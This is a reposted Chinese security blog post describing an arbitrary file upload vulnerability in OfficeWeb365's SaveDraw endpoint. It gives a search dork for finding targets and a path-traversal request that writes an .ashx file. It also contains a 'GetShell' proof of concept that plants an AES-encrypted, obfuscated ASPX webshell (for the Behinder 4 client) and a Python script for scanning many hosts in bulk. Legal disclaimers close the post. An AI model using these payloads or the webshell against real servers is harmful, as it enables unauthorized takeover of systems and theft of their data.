简介
OfficeWeb365 SaveDraw 接口存在任意文件上传漏洞,攻击者通过漏洞可以在服务器中上传任意文件获取服务器权限。
漏洞复现
步骤一:使用以下搜索语法进行搜索并确定攻击目标...
# 搜索语法"OfficeWeb365"
步骤二:对目标站点进行抓包并修改数据包如下进行发送....其中HTTP请求正文中会计算123-23的值并将计算结果写入文件drawPW10.ashx
POST /PW/SaveDraw?path=../../Content/img&idx=10.ashx HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 483data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler{public void ProcessRequest(System.Web.HttpContext context){System.Web.HttpResponse response = context.Response;response.Write(123 - 23);string filePath = context.Server.MapPath("/") + context.Request.Path;if (System.IO.File.Exists(filePath)){System.IO.File.Delete(filePath);}}public bool IsReusable{get { return false; }}}///---
步骤三:如上当HTTP响应正文中返回ok则说明命令执行成功!此时访问以下路径并查看执行结果文件...得到其表达式的结果!证明存在该漏洞...
http://IP/Content/img/UserDraw/drawPW10.ashx
步骤四:GetShell POC
https://github.com/Nuc-Orz-Lab/OfficeWeb365-rce/blob/main/poc.md
POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1Host:xxxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.434.18 Safari/537.36Content-Length: 2265Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: closedata:image/png;base64,01s34567890123456789y12345678901234567m91<%@ Page Language="C#" %><%@Import Namespace="System.Reflection" %><script runat="server">private byte[] Decrypt(byte[] data){string key="e45e329feb5d925b";data = Convert.FromBase64String(System.Text.Encoding.UTF8.GetString(data));System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();aes.Mode = System.Security.Cryptography.CipherMode.ECB;aes.Key = Encoding.UTF8.GetBytes(key);aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;return aes.CreateDecryptor().TransformFinalBlock(data, 0, data.Length);}private byte[] Encrypt(byte[] data){string key = "e45e329feb5d925b";System.Security.Cryptography.RijndaelManaged aes = new System.Security.Cryptography.RijndaelManaged();aes.Mode = System.Security.Cryptography.CipherMode.ECB;aes.Key = Encoding.UTF8.GetBytes(key);aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;return System.Text.Encoding.UTF8.GetBytes(Convert.ToBase64String(aes.CreateEncryptor().TransformFinalBlock(data, 0, data.Length)));}</script><%//byte[] c=Request.BinaryRead(Request.ContentLength);Assembly.Load(Decrypt(c)).CreateInstance("U").Equals(this);byte[] c=Request.BinaryRead(Request.ContentLength);string asname=System.Text.Encoding.ASCII.GetString(new byte[] {0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x2e,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79});Type assembly=Type.GetType(asname);MethodInfo load = assembly.GetMethod("Load",new Type[] {new byte[0].GetType()});object obj=load.Invoke(null, new object[]{Decrypt(c)});MethodInfo create = assembly.GetMethod("CreateInstance",new Type[] { "".GetType()});string name = System.Text.Encoding.ASCII.GetString(new byte[] { 0x55 });object pay=create.Invoke(obj,new object[] { name });pay.Equals(this);%>>---
shell:https://xxx/Content/img/UserDraw/drawPW1.aspx冰蝎4,deafult_aes
批量脚本
import argparseimport timeimport requestsdef get_url(file):with open('{}'.format(file),'r',encoding='utf-8') as f:for i in f:i = i.replace('n', '')send_req(i)def write_result(content):f = open("result.txt", "a", encoding="UTF-8")f.write('{}n'.format(content))f.close()def send_req(url_check):print('{} runing Check'.format(url_check))url = url_check + '/PW/SaveDraw?path=../../Content/img&idx=10.ashx'header = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36','Content-Type':'application/x-www-form-urlencoded'}data = ('data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public classrn''Handler1:System.Web.IHttpHandlerrn''{rn''public void ProcessRequest(System.Web.HttpContext context)rn''{rn''System.Web.HttpResponse response = context.Response;rn''response.Write(44 * 41);rn''rn''string filePath = context.Server.MapPath("/") + context.Request.Path;rn''if (System.IO.File.Exists(filePath))rn''{rn''System.IO.File.Delete(filePath);rn''}rn''}rn''public bool IsReusablern''{rn''get { return false; }rn''}rn''}///---rn')try:requests.packages.urllib3.disable_warnings()response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)url2 = "{}/Content/img/UserDraw/drawPW10.ashx".format(url_check)res2 = requests.get(url2, verify=False)if response.status_code == 200 and res2.status_code == 200 and '1804' in res2.text:result = '{} 存在OfficeWeb365 SaveDraw 任意文件上传漏洞! 请访问目标自测:{} n'.format(url_check,url2)print(result)write_result(result)time.sleep(1)except Exception as e:passif __name__ == '__main__':file = r"D:url.txt"get_url(file)
揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!!!!!
原文始发于微信公众号(揽月安全团队):OfficeWeb365 SaveDraw 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论